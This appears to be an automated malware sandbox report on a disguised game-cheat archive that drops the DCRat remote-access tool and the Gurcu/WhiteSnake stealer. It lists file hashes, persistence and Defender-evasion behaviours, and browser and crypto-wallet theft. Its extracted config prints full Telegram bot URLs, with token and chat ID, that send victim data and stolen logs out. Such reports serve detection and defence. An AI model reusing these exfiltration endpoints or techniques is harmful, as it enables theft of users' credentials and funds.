General

  • Target

    Hack.zip

  • Size

    1.8MB

  • Sample

    240722-s22sqavhqj

  • MD5

    ee6ed9dad9e44e6b851d82ef4f5c5bf4

  • SHA1

    9df5855ee93aa3771ae0989349409082639f1f2d

  • SHA256

    9a77c1df03fa36eac52d056f31852fdbbda28f3cab1e493b3214403014c524e5

  • SHA512

    b56da27f3911851e38d38c8c77d59be48cf5a97f83ffee488affb576de2a49a4c98a2db3778c5a40b372b5a85241a623b14c358f44247574c870d03cac762128

  • SSDEEP

    49152:v69wLFYzQ4HCnC0yGQEEGa9SwyD3Fl07J:Hdi0yGQTU1EJ

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendPhoto?chat_id=6513322270&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20EPDFAWZF%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CWindows%20Portable%20Devices%5CTrustedInstaller.ex

https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A25.858979

https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A13.138164

https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A12.502781

Targets

    • Target

      MalinovkaHack.exe

    • Size

      2.3MB

    • MD5

      684d0c5b768a7de891ff7a6c1d7a0e52

    • SHA1

      2073f2f64ef0f225320b441307d31d7f70412311

    • SHA256

      66f35f9abdbb58a53ad4c323ef2dc17d3dc11808d5ffaec3e7f8192845e7c762

    • SHA512

      beef37964f1c1a3c059938216a270d38c6687b22b401dae7f086496a6ce6ff8028988cae267c82491c5d5984b329a7e4ff63679df7f0bf74b430281e40521138

    • SSDEEP

      49152:bbA35OY/GyEjrK5Ul5ja45+CGml000ds/rczenW:bbJQGykrK5UlQZCH0dsTcKnW

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks